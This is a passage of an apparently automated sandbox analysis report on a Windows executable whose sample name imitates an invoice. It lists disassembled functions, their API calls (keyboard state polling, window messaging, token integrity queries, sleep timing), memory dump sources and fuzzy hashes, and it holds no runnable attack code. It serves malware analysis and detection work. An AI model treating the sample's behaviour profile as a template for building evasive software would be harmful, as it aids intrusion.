                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: 15d6df7abba24f6c0fda673b648fc0a44ee2162c837cf8d9fdd329c326068569
                                          • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                          • Opcode Fuzzy Hash: 15d6df7abba24f6c0fda673b648fc0a44ee2162c837cf8d9fdd329c326068569
                                          • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                          Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                          • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                          • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                          • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                          Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00402357
                                          • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                          • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                          • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                          • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                          • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                          Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                          • TranslateMessage.USER32(?), ref: 0045645C
                                          • DispatchMessageW.USER32(?), ref: 00456466
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                          • String ID:
                                          • API String ID: 2108273632-0
                                          • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                          • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                          • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                          • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                          Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00458A30
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                          • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                          • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                          • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                          Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 0045B204
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                          • _wcsstr.LIBCMT ref: 0045B289
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: 899d60c600cb03defd51949f250b9708d46bd725799c5b521baeadb23fec0c53
                                          • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                          • Opcode Fuzzy Hash: 899d60c600cb03defd51949f250b9708d46bd725799c5b521baeadb23fec0c53
                                          • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                          Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                          • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                          • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                          • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                          • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                          Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                          • __itow.LIBCMT ref: 0045936A
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                          • __itow.LIBCMT ref: 004593A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                          • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                          • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                          • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                          Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                          • SelectObject.GDI32(?,00000000), ref: 0040135C
                                          • BeginPath.GDI32(?), ref: 00401373
                                          • SelectObject.GDI32(?,00000000), ref: 0040139C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                          • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                          • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                          • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                          Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                          • __beginthreadex.LIBCMT ref: 00464AD8
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                          • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                          • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                          • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                          Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                          • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                          • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                          • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                          • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                          • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                          Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                          • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                          • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                          • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                          Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                          • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                          • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                          • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                          Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                          • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                          • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
